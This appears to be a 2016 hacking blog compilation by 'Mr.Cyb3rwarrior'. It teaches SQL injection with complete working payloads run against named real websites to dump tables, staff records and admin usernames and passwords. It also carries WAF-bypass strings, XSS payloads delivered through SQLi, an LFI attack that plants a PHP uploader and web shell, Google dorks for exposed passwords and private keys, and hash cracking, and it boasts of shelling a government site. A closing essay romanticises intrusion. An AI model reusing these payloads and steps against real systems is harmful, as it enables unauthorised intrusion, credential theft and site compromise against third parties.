Learn To hack : 2016

BasicAbout Sqli Dios BY Mr.Cyb3rwarrior

Hi Guyzz

ADesh kolte(Mr.Cyb3rwarrior)

Today i am making a tutorial on basic of Dump in One Shot [DIOS]

I already know tutorial by Ajkaro and by Zen javanicus , Code ninja is best on this DIOS

And i too learned from their tutorials.But still some of my friends don't understand DIOS and want to learn this and some of friends messaged me about this to learn.So now i think to make a tutorial on DIOS. So lets start

======================================================

First see this query :->

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

In above query we will get all DATABASES

Now there (@a) is called variable and we are selecting this variable from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause

So i practiced above query like this :->

(

[b]

/*1st select is selecting variable*/

select (@a) from

(

/*2nd select storing 0x00 i variable. So if you want to store something then store in this 2nd select.Also we select third select after that but seperated with comma(,) */

select (@a:=0x00),

(

/*Now this third select. In this select we write our main query like to select database query,table query(information_schema.tables),column query(information_schema.columns).

Also we write our condition in this third select see where part here :-> where (@a)

Also we can use 2 or more than 2 condition in this third select :-> where table_name!='information_schema' and (@a) in

Don't forget to use and to use more than one condition

See more condition :-> where table_name!='information_schema' and table_name like 'us%' and (@a) in

Like this we can use many condition

With that condition like we get only that table_name which start with us

So i want to say you that you guys should play with sql queries so that you learn more and can use your desired condition which get great result.

select (@a) from (information_schema.schemata) where (@a) in

(

/*Now in third select after 'IN' Clause we use our concat part.Note that this is use so that we see our desire result on page.

Like Table Name :-> Admin we see like this on page*/

@a:=concat

(

/*Here we use @a variable mean till now what we do is using variable come here so that we our desire result using that variable.So always include this variable in concat part*/

@a,schema_name,'<br>'

)

So i wrote all which is essential to note while doing DIOS.

That way i learned DIOS

In short :->

1st select use to select variable

2nd select use to store value in variable.We can store multiple value in different different variable but with comma seperated.Like :->

(@a:=0x00),(@tbl:=0x00),(@count:=0x00)

Seel all those variable storing value and seperated with comma

3rd select use to write our main query , conditions, concating

Now see this in live action :->

DATABASES :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,

(

select (@a) from

(

select (@a:=0x00),

(

select (@a) from (information_schema.schemata) where (@a) in

(

@a:=concat

(

@a,schema_name,'<br>'

)

,5,6,7,8,9,10--+

We write this while practicing and then we see we write correct then to check we write our above query like this :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in(@a:=concat(@a,schema_name,'<br>'))))a),5,6,7,8,9,10--+

We see this result :->

To do more better :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,'<br>',schema_name,'<br>'))))a),5,6,7,8,9,10--+

Result

Notice the change when we use <br> before schema_name

Ok now to select Table names with more experiment in concat part :->

First with learning mode ====>

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,

(

select (@a) from

(

select (@a:=0x00),

(

select (@a) from (information_schema.tables) where (@a) in

(

@a:=concat

(

@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'

)

a),5,6,7,8,9,10--+

Then in Real mode :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from (select (@a:=0x00),(select (@a) from (information_schema.tables) where (@a) in(@a:=concat(@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'))))a),5,6,7,8,9,10--+

Result :->

=====================================================

Now to get table names which not belongs from information schema :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.tables) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=red size=5>Table name :-> </font>',table_name,'<br>'))))a),5,6,7,8,9,10--+

Now we get only those tables which not belongs to information schema

What i use there :-> where table_schema!='information_schema' and (@a) in

Please note this we write information_scehma in under ' ' you can also use to change this in hex format if necessary

Result :->

Please from now i will not write Experiment mode like :->

(

select (@a) etc etc etc

)

Because i now thinking you guys learned this way for practicing.Whenever you guys confuse then write the query first in this manner mean experiment mode and then you see query correct then check it after little modify this query like i did this before

======================================================

Now to get column names :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),,5,6,7,8,9,10--+

Result :->

Now to get both table names and column names :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'<br><font color=lime size=5>Table name :-> </font>',table_name,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),5,6,7,8,9,10--+

Result :->

See we got both table names and column names in ONE SHOT Big Grin

======================================================//

/************Extracting Column from Tables

Now table name :-> staff

Table name is "staff'

Column name use "name" and "email"

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from staff where (@a) in (@a:=concat(@a,'<br><font color=red size=5>Name :-> </font>',name,'<br><font color=magenta size=5>Email :-> </font>',email,'<br>'))))a),5,6,7,8,9,10--+

Result :->

Sorry here in website Email Column Is Blank For this reason Email not printed

=====================================================

Time to do more experiment :->

[b]Get table name start with "st" and column name start with "st" :->

http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and table_name like 'st%' and column_name like 'st%' and (@a) in (@a:=concat(@a,'<br><font color=lime size=5>Table name :-> </font>',table_name,'<br><font color=red size=5>Column name :-> </font>',column_name,'<br>'))))a),5,6,7,8,9,10--+

Result :->

I use condition there using LIKE Operator. So now this all upto you how you play with this and experiment with dios and Practice

This is all basic tutorial on DIOS from myside.If you like this then i will write more on advance DIOS

That's all Hope you guys learn something

Thanks for Reading

=====================================================

How MR Cyb3rwarrior Shelled Pak Goverment WebSite BY Adesh kolte

Union Based SQL Injection (WAF Bypassing) Tutorial By Mr.cyb3rwarrior_Ades

After Our Tutorial on Basics Of SQL Injection.
Union based SQL injection + WAF Bypassing By Adesh

Today i m Going To Discuss About Union based SQL injection And WAF Bypassing Techniques.
Lets Start Injecting.
Target Site:http://radiozhakkasmarathi.in/full_review.php?id=3
Add Single Quote (') at the End Of The URL
http://radiozhakkasmarathi.in/full_review.php?id=3'

And Get MYSQL Error.
Lets Balance Our Query for Further Injecting.
--

http://radiozhakkasmarathi.in/full_review.php?id=3--+

http://radiozhakkasmarathi.in/full_review.php?id=3-- -

http://radiozhakkasmarathi.in/full_review.php?id=3%23

http://radiozhakkasmarathi.in/full_review.php?id=3;

Here Is A Small Explanation on Balance and Comment in our Injection.

After Balancing Our Query . Next is Count Total Number Of Columns
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 1-- -
No Error !
http://radiozhakkasmarathi.in/full_review.php?id=3' order by 3-- -
No Error!

http://radiozhakkasmarathi.in/full_review.php?id=3' order by 6-- -
Again No Error !

http://radiozhakkasmarathi.in/full_review.php?id=3' order by 7-- -
Here We Get Error !
Error 2

Now Try To Find Our Vulnerable Columns.
http://radiozhakkasmarathi.in/full_review.php?id=-3' union select 1,2,3,4,5,6-- -

If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.
/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
Just Change The Union Select With Following Bypass URLs.

Lets Continue Our Tutorial.
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+

Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+

Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+

Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+

Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+

http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+

and
**************For Our Target We use
/*!50000union */ and concat/*!50000()*/

http://radiozhakkasmarathi.in/full_review.php?id=-3' /*!50000union */ select 1,2,3,4,5,6-- -

We Will Get Our Vulnerable Columns Printed On The Page.2 is Our Vulnerable Column.

Here Are Some Variables Of MYSQL.
@@version = Current Version
@@GLOBAL.VERSION = Current Version
User() = Current User
Database = Current Database

for Version :http://radiozhakkasmarathi.in/full_review.php?id=-3' /*!50000union */ select 1,@@version ,3,4,5,6-- -

We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.
we DIOS it

http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(0x3c666f6e7420636f6c6f723d7265643e3c746974746c653e4d722e635962337277615272696f725f41646573686b6f6c74653c746974746c653e,0x3c6c693e,version(),0x3c6c693e,user(),0x3c6c693e,database(),make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))*/,3,4,5,6-- -

Lets Execute our DIOS Query

We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then write Query
Example:
http://radiozhakkasmarathi.in/full_review.php?id=3' and 0 /*!50000Union*/ Select 1,concat/*!50000(username,0x3a3a,password)*/,3,4,5,6 from site_user -- -

For Video TUtorial

Enjoy :]

Tutorial By Adesh kolte

https://www.facebook.com/kolteAdesh

xss via SqL injection part 2 tutorial

Manipulating SQL Injection Queries in XSS Payload

If we go on Further , we can also show our SQLi Queries Result in a XSS POP-Up Alert.We will insert our SQLi Queries in XSS Payload for showing up SQL Queries output in a POP-Up.
First let's say we want to Show The Current Version of the Target Site in a XSS POP-Up .See the example,

Our XSS Payload for Showing Version in a POP-Up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The Red highlighted Text is our SQLi Query and Blue Text is injector name and the Green Text is That we have put for our Variable , and the Other one is Our XSS Payload.
Before executing our Query we need to encode our XSS Payload in Hex Value.

Hex Value of XSS Payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e
Let's insert our XSS Payload in the Vulnerable column for Showing the Pop-up for Current Version.

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564206279204d722e437962337277617272696f725f41646573687e3a56657273696f6e3a,version(),0x30782729223e

),4,5,6,7,8,9--+
Let's Execute our Payload:

and here we got the Current Version in a XSS Pop-up.We can Do the Same For the Current Database and user.
After POP-UP the Version next part is To Showing Tables in a XSS POP-UP Alert.So we have to Insert our Query in XSS Payload for Displaying them in XSS Alert.
Here is our DIOS Query for getting Tables from the Current Database.

(select group_concat(table_name) from information_schema.tables where table_Schema=database())

Let's Add this DIOS Query in our XSS Payload .

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

Now execute this Query and Check the output Response

We got the Tables from the current Database . But if we go on Further and add HTML TAGS for Starting each Table in a New Line like <BR>.But Here This HTML Doesn't Work.
In XSS we use " \n " which is used for showing each result in a new Line.So will add This Part to Our DIOS Query to show All Tables in a New Line in our XSS Pop-Up.

We Need to First Encode it in Hex Value and then Insert into DIOS Query.

HEX Value: \n :0x5c6e
\n converted into hex 0x5c6e

Let's Add it in our XSS Payload :

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827496e6a6563746564204279204d722e637962337277617272696f7241646573687e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5,6,7,8,9--+

And Here we can see all tables are starting from a New line in XSS Pop-up Alert Box.We can do the Same For Columns by adding that Part in our DIOS Query.I Leave That part for You Guys.

Enjoy :]

Xss using Sql injection Tutorial 1

Tn this Tutorial you will learn XSS Attack via SQL Injection.
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".
In XSS Attack via SQL Injection we will Execute our XSS payloads in UNION BASEDquery.

For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site

http://www.lokmat.com/storypage.php?catid=31&newsid=3448

After Counting the Columns there are 9 Total Number of Columns.So let's ready up our Union Based Query and execute it .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+

There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column
Here is the our XSS Payload that we are going to inject into the UNION BASED Query,

XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this Payload we need to Encode it in HEX Value (use hackbar)

HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,

http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output

This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload
Enjoy
This is the basic XSS Payload ,you can try more Payloads which will posted in the next tutoria

XSS Cheat Sheet:

This vulnerability occurs due to Poor Developing application of the code.A Attacker able to inject his malicious HTML code through client web browsers.
Mostly The Whole XSS Attack is based on Javascript and HTML for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .
XSS can be used for Phishing as well as Stealing Accounts or we can do some Social Engineering with XSS.
XSS Cheat Sheet:

shell upoading Using LFI by Mr.Cyb3rWarrior (ADesh kolte)

Today I Shown how To Hack A Website using LFI:- Please Do Not Deafce This

Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php

Step:2 Now Remove All Text After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=

Step:3 Put The Back_slash After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=/

If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80% If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%

Here Is got Error on Website After Put (/)

Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9

Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9

Step:4 Put This Code After The (./?content=) /proc/self/environ Now Url Look Like This:-

http://www.clginstitute.org/?content=/proc/self/environ

You Seen After Put /proc/self/environ Its Seen Some Seesion Request On Website, That Mins We Are Able To Upload Our Shell.

Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-

Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.

And Submit The Request.

Uploader Code:-

<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>

Step:7 Now You Seen Our Uplader in The Website, Here Upload Your shell And Submit Your Request in Tamper Data.

Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.

Step:9 Your Shell Got Uploaded On the Server Check It Now.

Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.

And Also Post Your Webhacking tutorials in Fourm.

BY Mr.Cyb3rWarrior (Adesh kolte)

Basic part of sqli practically

hello Guyzzz

only for Educational purpoe

let me intorduce my self

im Adesh kolte and im from india,

this is my first tutorial on basic sql injection

this was the basic tutorial so it will be little lengthy so be patient while watching

im not discussing any theory regarding sql injection so i recommend watch some articles about sql db strucute and backend process of sql injection to understand the sql injection in a better way .so im discussing only the practial part.

before starting injecting download the following tool from google

=> hackbar addon or rootkajji addon for mozilla firefox.

ok lets start with basic based sql injection

site> http://greenwall.org/recent-news.php?id=16

we can check whether the site is vulnerable to sql injection or not by putting a singlequote or a back slash (\) after perameter [id=2] lets try on a site

http://greenwall.org/recent-news.php?id=16 '

'

we got the following error

=> check the manual that corresponds to your MySQL server version for the right syntax to use near ''-- -' at line 1

that mean this site is vulnerable to sql injection

and some times even the site dontshow this error there is a chance for sql injection vulnerability

in such cases how we can know that our target site is vulnerable or not ??

obseve the site behaviour mean => when u put a single quote or backslash (\) after perameter( id=2' ) u can obseve some content is missing on page or something on the page don't load normally, so it also mean that our target site is vulnerable to sql injection.***

ok lets continue with our injection

http://greenwall.org/recent-news.php?id=16 '

we got an sql error

first of all we have to fix the query before we go further

(fixing query is nothing but making the site load normally without any error)

usually we use -- in integer based to fix the query

http://greenwall.org/recent-news.php?id='16 '--+ (error fixed)

so we can continue to the next part which is finding number of coloumns in the site

there are many methords for finding no.of coloumns for now im showing only 2 mehords.***

one with order by and the other with group by

1. order by

http://greenwall.org/recent-news.php?id='16 '

order by 100--+

we got the following error

Query failed: blank some text missing

http://greenwall.org/recent-news.php?id='16 '

order by 16--+

it mean the site has less than 16 coloumns

now we have to use union statement to find the vulnerable coloumns

http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -

u can see 3 and 4 numbers on page(vulnerable coloumns)

now we can get everything from this vulenrable coloumns

lets get some basic information Smile

note::

1. version() or @@version => to display version of server

2. user() or @@user => to display the username of site

ok lets get them one by one

http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -

result on web page =>

5.6.29

http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -

result => green62_view@localhost

http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -

result => green62_site

thats all for this tutorial

Enjoy

tutorial by Adesh kolte

Video tutorial

Basic part of sqli

https://youtu.be/A-EYrT3i_v0

Hacking Using Google Dork List

Hacking Using Google Dork List
Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time

[Level:Beginner]

Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=

Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wp - content/backup - *

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage - "

Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac - trunk - "Google Code" - source - repository

Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server - dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords....

Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd

Hacking Using Google Dork List

SQL Injection (Manually)

SQL Injection (Manually):-
Let’s Start:

Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to

get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here” and open in new tab.
Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql attack or not.To Check SQL vulnerability add „ sign after the URL
http://www.website.com/news/news.php?id=130′
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"

Step2: Find number of columns. Lets use "ORDER BY” clause here, it is used to sort the columns.Choose any number, say 10. Here I have assumed that number columns cant be more then 10.”–” is used for making anything after it comment.
Now go to site which is Vulnerable to SQL.http://www.Website.com/news/news.php?id=130 order by 10– Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9. But again we got an error. This means number of columns are less than 9. Like this we keep on moving, until we don‟t get any error. Finally we reach on ‟6′

http://www.website.com/news/news.php?id=130 order by 6– we didn‟t get any error, this means there are 6 columns.
Step 3:Find vulnerable columns. Now lets use "UNION ALL” and "SELECT” command. Remember to put dash (-) before 130.http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6–. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version” or "verson()” (if first one doesn‟t work).

http://www.website.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6– We got the version on screen. It is. The only thing to note is that version is 5 point something that is greater than 5. We would have followed some other approach in case the version would be less than 5 because there is no database by default like "information_schema” which stores information about tables/columns of other databases. in version less than 5.
Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–

We got first table name on the screen.
To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
Step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with „column‟http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()– There is a repeating element like in this case is „id‟ .From

it, we come to know which table number has which columns.
Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a” is used simply to insert a colon in result to separate it, it is hex of colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin–.

So finally we got the usernames and passwords on screen. But passwords are encrypted. Mostly these encryptions are crackable. Lets choose any username say "Sneds”. The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .
Lets logon to http://md5crack.com/crackmd5.php or http://www.md5d ecrypter.co.uk and put the hashed(encrypted) password here. And it would crack for us. We got „oorwullie‟ in result ( password in clear text).
Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying.

Sometimes very strong hashes can not be cracked. Login page of website: So you got the key, where is lock now ? Most of the websites have login pages at default locations. There is any website, saywww.xyz.com. The login page would be at www.xyz.com/admin ,www.xyz.com/administrator , www.xyz.com/adminlogin etc. Download this admin page finder

Example of Injection

www.bitaraf.com

http://www.bitaraf.com/showlink.php?id=.1244923%injecthere (vulnerable )

http://www.bitaraf.com/showlink.php?id=.1244923+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2Cconcat%280x3c2f7469746c653e3c666f6e7420636f6c6f723d7265643e4164657368206861786f723c62723e%2Cuser%28%29%2C0x3c62723e%2Cversion%28%29%2C0x3c62723e%2Cdatabase%28%29%2C0x3c62723e%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28select%281%29from%28information_schema.columns%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2Ctable_name%2Ccolumn_name%29%29%2C%40%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--+

ADMIN PANNEL

:bitaraf.com/admin/login.php

7 Qualities of Highly Effective Hackers

When asked to write on this topic, I admit that it made me fringe just a bit. Because I don't consider myself to be a highly effective hacker. I find myself as a noob everywhere that I'm trying to learn new things, or I am frustrated with the most ridiculous "hacker" material on the web, written by school-taught programmers that follow step by step instructions out of a manual that everyone has already read. Then I thought to myself.. "That's it!" That is Number One!

Quality One- Always A N00b

Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and comments you always see the trolls calling the weakest link a noob and picking on them.. and then THEY are revealed to be newbies also? Well guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I already am adept at the subject or skill level, at hand, I find that not only have months gone by without me learning anything new.

I have also gotten rusty at things I was beginning to learn. So as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob. Always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is now teaching others how to do it and busy with something else he doesn't yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments, picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone because they have settled for what they know and are satisfied with it in an ever evolving and changing world of technology.

Quality Two- Curiosity

Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems are just following step by step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity.

These personal drives will bring a person farther in skill than the need for a promotion or recognition will. "I wonder what would happen if I tried to.." "What do you suppose they keep in here.." "OMG! What if I trick it into running this as a..." These are the basic thought patterns of an effective hacker. Not just when he has a job to do. I mean always. For example when you were a kid (or even now) played a video game and found a weird glitch (not necessarily a 'cheat') that you thought was funny. "Oh wow. If I walk in this corner backward he kinda gets stuck there.. UPSIDE DOWN! LOL", "What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I'm not even supposed to be yet!". OK This is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.

Quality Three- Enjoys being places he doesn't belong

Hey sorry all you white-hats out there, but it's true. I won't condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don't know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.

Quality Four-An unbalanced lifestyle

I often find myself engorged in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day.. and then it's time to go back in to work. That's them. LOL Now I am not saying that being an effective hacker means they do not have a life (though some may not). Alot of very successful people get obsessed with what they are working on and do nothing but that.. For a while. Then they go through a phase where they are obsessed with something different.

Quality Five- Likes to break things

Come on guys! We're hackers! We love to smash things apart and see what happens. Because face it, it's much easier to break something than to make it and it rewards a valuable opportunity to put it back together in a different way.

Quality Six- Well Organized

In the beginning, it's ok to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OS's. But eventually that's going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You'll see varions windows and terminals open, seperate directories for everything, that are well categorized, a task manager changing process priorities as he's bouncing from one project to the other, across his screen.

Quality Seven- Everything is Insecure until... Never.

The most efficient hackers know that all software, hardware, and access controls are man made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of the creators. People. Nothing can ever be completely trusted, just as no person can be completely trusted.